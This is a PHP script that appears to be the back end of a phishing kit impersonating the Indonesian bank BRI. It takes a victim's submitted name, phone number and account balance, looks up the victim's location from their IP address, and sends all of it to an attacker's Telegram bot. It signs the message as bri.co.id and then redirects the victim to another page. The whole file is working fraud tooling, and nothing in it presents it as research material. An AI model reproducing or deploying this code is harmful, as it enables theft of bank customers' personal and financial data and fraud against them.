<?php
date_default_timezone_set("Asia/Jakarta"); // ✅ FIX WAKTU
session_start();
include 'telegram.php';

// =====================
// ANTI SPAM CONFIG
// =====================
$limit_time = 30; // detik

// Honeypot
if (!empty($_POST['email'])) {
    die("Blocked");
}

// Rate limit
if (isset($_SESSION['last_submit'])) {
    if (time() - $_SESSION['last_submit'] < $limit_time) {
        die("Tunggu beberapa detik sebelum kirim lagi");
    }
}
$_SESSION['last_submit'] = time();

// =====================
// VALIDASI INPUT
// =====================
$a = trim($_POST['b'] ?? '');
$b = trim($_POST['b'] ?? '');
$c = trim($_POST['c'] ?? '');
$d = trim($_POST['d'] ?? '');

if ($a == '' || $b == '' || $c == '' || $d == '') {
    die("Data tidak lengkap");
}

// =====================
// AMBIL IP & LOKASI
// =====================
$ip = $_SERVER['REMOTE_ADDR'];

$lokasi = @json_decode(file_get_contents("http://ip-api.com/json/$ip"));
$kota   = $lokasi->city ?? 'Tidak diketahui';
$prov   = $lokasi->regionName ?? 'Tidak diketahui';
$negara = $lokasi->country ?? 'Tidak diketahui';

// =====================
// FORMAT PESAN
// =====================
$message = "
📩 *NOTIF BRI* 


• Nama   : $b
• NoHp   : $c
• Saldo  : $d

©by:bri.co.id
";

// =====================
// KIRIM TELEGRAM
// =====================
function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot$id_bot/sendMessage";

    $data = [
        'chat_id' => $telegram_id,
        'text' => $message,
        'parse_mode' => 'Markdown'
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);

// =====================
// REDIRECT
// =====================
header("Location: ../ot.html");
exit;
?>